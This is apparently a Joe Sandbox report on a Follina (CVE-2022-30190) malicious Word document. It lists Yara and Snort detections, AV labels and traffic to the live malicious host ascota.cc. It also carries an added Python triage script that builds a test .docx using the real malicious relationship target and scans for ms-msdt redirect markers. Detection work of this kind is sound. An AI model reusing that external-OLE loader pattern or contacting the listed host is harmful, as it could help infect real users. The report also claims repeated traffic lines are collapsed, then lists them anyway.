
Windows Analysis Report
3BgX69C870

Overview

General Information

Sample Name:3BgX69C870 (renamed file extension from none to docx)
Analysis ID:686208
MD5:d805b55d60f9ca73ae71ed68ff692175
SHA1:947691dbba33dfeb974babcb43d3ceb7991dae29
SHA256:6a0acf2389d95abc590c8b6a327521312c4de176efce271468817c840745a096
Tags:docx

Detection

Follina CVE-2022-30190
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Antivirus detection for dropped file
Snort IDS alert for network traffic
Contains an external reference to another file
Detected suspicious Microsoft Office reference URL
Yara signature match
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Uses insecure TLS / SSL version for HTTPS connection
Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 1448 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • cleanup
No configs have been found
Yara matches (submitted document)

Source: document.xml.rels
Rule: SUSP_Doc_WordXMLRels_May22
Description: Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation
Author: Tobias Michalski, Christian Burkard, Wojciech Cieslak
Strings:
  • 0x39:$a1: <Relationships
  • 0x3b5:$a2: TargetMode="External"
  • 0x3ad:$x1: .html!

Source: document.xml.rels
Rule: INDICATOR_OLE_RemoteTemplate
Description: Detects XML relations where an OLE object is referencing an external target in dropper OOXML documents
Author: ditekSHen
Strings:
  • 0x375:$olerel: relationships/oleObject
  • 0x38e:$target1: Target="http
  • 0x3b5:$mode: TargetMode="External

Yara matches (PCAP)

Source: sslproxydump.pcap
Rule: SUSP_PS1_Msdt_Execution_May22
Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation
Author: Nasreddine Bencherchali, Christian Burkard
Strings:
  • 0x535f:$a: PCWDiagnostic
  • 0x5353:$sa3: ms-msdt
  • 0x53b6:$sb3: IT_BrowseForFile=

Source: sslproxydump.pcap
Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22
Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation
Author: Tobias Michalski, Christian Burkard
Strings:
  • 0x5342:$re1: location.href = "ms-msdt:

Source: sslproxydump.pcap
Rule: JoeSecurity_Follina
Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190
Author: Joe Security

Yara matches (dropped files)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\index[1].htm
Rule: SUSP_PS1_Msdt_Execution_May22
Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation
Author: Nasreddine Bencherchali, Christian Burkard
Strings:
  • 0x23f7:$a: PCWDiagnostic
  • 0x23eb:$sa3: ms-msdt
  • 0x244e:$sb3: IT_BrowseForFile=

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\index[1].htm
Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22
Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation
Author: Tobias Michalski, Christian Burkard
Strings:
  • 0x23da:$re1: location.href = "ms-msdt:

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\index[1].htm
Rule: JoeSecurity_Follina
Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190
Author: Joe Security

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\951D3BEA.htm
Rule: SUSP_PS1_Msdt_Execution_May22
Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation
Author: Nasreddine Bencherchali, Christian Burkard
Strings:
  • 0x23f7:$a: PCWDiagnostic
  • 0x23eb:$sa3: ms-msdt
  • 0x244e:$sb3: IT_BrowseForFile=

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\951D3BEA.htm
Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22
Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation
Author: Tobias Michalski, Christian Burkard
Strings:
  • 0x23da:$re1: location.href = "ms-msdt:
      No Sigma rule has matched
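The Yara rules above key on a small set of strings: in the document, an oleObject relationship in document.xml.rels whose Target is an external URL ending in ".html!" (the "!" suffix is what makes Word fetch and render the remote HTML), and in the fetched HTML, a location.href assignment to an ms-msdt: URI carrying PCWDiagnostic and IT_BrowseForFile= parameters. The Python script below is an added static triage example, not part of this Joe Sandbox report or of the Yara rules it cites: it builds a minimal .docx in memory, checks the relationships part for the remote-HTML loader pattern, and scans a stand-in for the fetched HTML for the ms-msdt markers. The only value taken from the report is the extracted URL https://ascota.cc/index.html!; the relationship IDs, the benign document, and the HTML sample (which carries the marker strings only, not a working payload) are constructed for the demonstration.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_PATH = "word/_rels/document.xml.rels"
PKG_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
IMG_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"
LINK_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"

# Loader pattern from the document.xml.rels rules: external http(s) target ending in ".html!"
FOLLINA_TARGET_RE = re.compile(r"""^https?://[^\s"']+\.html!$""", re.IGNORECASE)
# Stage-2 pattern from the msdt rules: JavaScript redirect to an ms-msdt: URI
MSDT_REDIRECT_RE = re.compile(r"""location\.href\s*=\s*["']ms-msdt:""", re.IGNORECASE)


def build_docx(rels_xml):
    """Wrap a document.xml.rels in a minimal OOXML zip (constructed test input, not a real document)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<document/>")
        z.writestr(RELS_PATH, rels_xml)
    return buf.getvalue()


def external_ole_targets(docx_bytes):
    """Return the Target of every oleObject relationship that has TargetMode="External"."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        if RELS_PATH not in z.namelist():
            return []
        root = ET.fromstring(z.read(RELS_PATH))
    return [
        rel.get("Target", "")
        for rel in root.iter("{%s}Relationship" % PKG_NS)
        if rel.get("TargetMode") == "External" and rel.get("Type") == OLE_REL
    ]


def docx_follina_targets(docx_bytes):
    """External OLE targets that match the remote-HTML loader pattern ('.html!' suffix)."""
    return [t for t in external_ole_targets(docx_bytes) if FOLLINA_TARGET_RE.match(t)]


def html_msdt_indicators(html):
    """Report each ms-msdt marker the rules look for in the fetched HTML."""
    return {
        "msdt_redirect": bool(MSDT_REDIRECT_RE.search(html)),
        "pcwdiagnostic": "PCWDiagnostic" in html,
        "browse_for_file": "IT_BrowseForFile=" in html,
    }


def is_msdt_stage2(html):
    """A redirect to ms-msdt: plus at least one diagnostic-package parameter is the stage-2 signature."""
    ind = html_msdt_indicators(html)
    return ind["msdt_redirect"] and (ind["pcwdiagnostic"] or ind["browse_for_file"])


def triage(docx_bytes, fetched_html=None):
    """Combined verdict: loader pattern in the document, and stage-2 check when the HTML is available."""
    targets = docx_follina_targets(docx_bytes)
    return {
        "remote_html_loader": bool(targets),
        "targets": targets,
        "msdt_stage2": is_msdt_stage2(fetched_html) if fetched_html is not None else None,
    }


# Constructed relationships part mirroring the relationship the report extracted from the sample.
MALICIOUS_RELS = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{PKG_NS}">
  <Relationship Id="rId1" Type="{OLE_REL}" Target="https://ascota.cc/index.html!" TargetMode="External"/>
</Relationships>"""

# Constructed benign part: an embedded image and an ordinary external hyperlink must not be flagged.
BENIGN_RELS = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{PKG_NS}">
  <Relationship Id="rId1" Type="{IMG_REL}" Target="media/image1.png"/>
  <Relationship Id="rId2" Type="{LINK_REL}" Target="https://example.com/page.html" TargetMode="External"/>
</Relationships>"""

# Constructed stand-in for the fetched index.html: carries the marker strings only, no working payload.
STAGE2_HTML = """<html><body><script>
window.location.href = "ms-msdt:/id PCWDiagnostic IT_BrowseForFile=<elided>";
</script></body></html>"""
BENIGN_HTML = "<html><body><p>Quarterly report</p></body></html>"

if __name__ == "__main__":
    print(triage(build_docx(MALICIOUS_RELS), STAGE2_HTML))
    print(triage(build_docx(BENIGN_RELS), BENIGN_HTML))
```

The document check is deliberately narrower than the INDICATOR_OLE_RemoteTemplate rule: it only fires on oleObject relationships, so external hyperlinks and remote templates (a different attachedTemplate relationship type) are not reported here. Run it over an extracted document.xml.rels from a suspect file and, where the sandbox saved the fetched page, over that HTML as well.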
Snort IDS alerts (all seven are UDP DNS queries from 192.168.2.22 to 8.8.8.8:53, SID 2027758, classtype Potentially Bad Traffic):

Timestamp                 Source port
08/18/22-10:44:56.070010  55868
08/18/22-10:45:02.957827  49688
08/18/22-10:45:02.979786  58836
08/18/22-10:45:08.507639  50134
08/18/22-10:45:08.539171  55275
08/18/22-10:45:11.469767  59915
08/18/22-10:45:11.508650  54408

      AV Detection

Source: 3BgX69C870.docx | Avira: detected
Source: 3BgX69C870.docx | Metadefender: Detection: 20%
Source: 3BgX69C870.docx | ReversingLabs: Detection: 65%
Source: https://ascota.cc/index.html | Avira URL Cloud: Label: malware
Source: https://ascota.cc/index.htmlyX | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\index[1].htm | Avira: detection malicious, Label: JS/CVE-2022-30190.G
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\951D3BEA.htm | Avira: detection malicious, Label: JS/CVE-2022-30190.G
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DB03D47C.htm | Avira: detection malicious, Label: JS/CVE-2022-30190.G

      Exploits

Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\index[1].htm, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\951D3BEA.htm, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DB03D47C.htm, type: DROPPED
Source: document.xml.rels | Extracted files from sample: https://ascota.cc/index.html!
Source: unknown | HTTPS traffic detected: 50.31.246.2:443 -> 192.168.2.22:49172 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 50.31.246.2:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 50.31.246.2:443 -> 192.168.2.22:49181 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown | HTTPS traffic detected: 50.31.246.2:443 -> 192.168.2.22:49171 version: TLS 1.2
Source: global traffic | TCP traffic: 192.168.2.22:49171 through 192.168.2.22:49185 <-> 50.31.246.2:443 (15 connections from consecutive client ports to the same HTTPS server, packets in both directions; the repeated per-packet entries are collapsed into this one line)
Source: global traffic | DNS query: name: ascota.cc (7 queries)
Source: global traffic | TCP traffic: 192.168.2.22:49171 through 192.168.2.22:49174 -> 50.31.246.2:443 (repeated outbound per-packet entries, collapsed)
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 50.31.246.2:443

      Networking

      Source: Traffic | Snort IDS: 2027758 ET DNS Query for .cc TLD 192.168.2.22:55868 -> 8.8.8.8:53
      Source: Traffic | Snort IDS: 2027758 ET DNS Query for .cc TLD 192.168.2.22:49688 -> 8.8.8.8:53
      Source: Traffic | Snort IDS: 2027758 ET DNS Query for .cc TLD 192.168.2.22:58836 -> 8.8.8.8:53
      Source: Traffic | Snort IDS: 2027758 ET DNS Query for .cc TLD 192.168.2.22:50134 -> 8.8.8.8:53
      Source: Traffic | Snort IDS: 2027758 ET DNS Query for .cc TLD 192.168.2.22:55275 -> 8.8.8.8:53
      Source: Traffic | Snort IDS: 2027758 ET DNS Query for .cc TLD 192.168.2.22:59915 -> 8.8.8.8:53
      Source: Traffic | Snort IDS: 2027758 ET DNS Query for .cc TLD 192.168.2.22:54408 -> 8.8.8.8:53
      Source: global traffic | HTTP traffic detected:
        GET /index.html HTTP/1.1
        Accept: */*
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
        UA-CPU: AMD64
        Accept-Encoding: gzip, deflate
        Host: ascota.cc
        Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected:
        GET /index.html HTTP/1.1
        Accept: */*
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
        UA-CPU: AMD64
        Accept-Encoding: gzip, deflate
        Host: ascota.cc
        If-Modified-Since: Thu, 02 Jun 2022 20:21:18 GMT
        If-None-Match: "fbdacf8fb5cca0abfed43223d32f89dd"
        Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected:
        GET /index.html HTTP/1.1
        Accept: */*
        UA-CPU: AMD64
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
        Host: ascota.cc
        If-Modified-Since: Thu, 02 Jun 2022 20:21:18 GMT
        If-None-Match: "fbdacf8fb5cca0abfed43223d32f89dd"
        Connection: Keep-Alive
      Source: Joe Sandbox View | ASN Name: FLYUS FLYUS
      Source: Joe Sandbox View | JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
      Source: Joe Sandbox View | JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
      Source: unknown | HTTPS traffic detected: 50.31.246.2:443 -> 192.168.2.22:49172 version: TLS 1.0
      Source: unknown | HTTPS traffic detected: 50.31.246.2:443 -> 192.168.2.22:49173 version: TLS 1.0
      Source: unknown | HTTPS traffic detected: 50.31.246.2:443 -> 192.168.2.22:49181 version: TLS 1.0
      Source: ~WRS{27621888-E8BB-4FE6-AECB-5EEE72734B15}.tmp.0.dr, ~WRF{CAFD337F-CA0A-421A-962F-5A83F314B963}.tmp.0.dr | String found in binary or memory: https://ascota.cc/index.html
      Source: ~WRF{CAFD337F-CA0A-421A-962F-5A83F314B963}.tmp.0.dr | String found in binary or memory: https://ascota.cc/index.htmlyX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5F4EA255-C5EC-4225-B349-94755FC9E7B4}.tmp
      Source: unknown | DNS traffic detected: queries for: ascota.cc
      Source: unknown | HTTPS traffic detected: 50.31.246.2:443 -> 192.168.2.22:49171 version: TLS 1.2

      System Summary

      Source: document.xml.rels, type: SAMPLE | Matched rule: Detects XML relations where an OLE object is referencing an external target in dropper OOXML documents Author: ditekSHen
      Source: sslproxydump.pcap, type: PCAP | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
      Source: sslproxydump.pcap, type: PCAP | Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
      Source: document.xml.rels, type: SAMPLE | Matched rule: SUSP_Doc_WordXMLRels_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, Wojciech Cieslak, description = Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-06-20, hash = 62f262d180a5a48f89be19369a8425bec596bc6a02ed23100424930791ae3df0
      Source: document.xml.rels, type: SAMPLE | Matched rule: INDICATOR_OLE_RemoteTemplate author = ditekSHen, description = Detects XML relations where an OLE object is referencing an external target in dropper OOXML documents
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\index[1].htm, type: DROPPED | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\index[1].htm, type: DROPPED | Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\951D3BEA.htm, type: DROPPED | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\951D3BEA.htm, type: DROPPED | Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
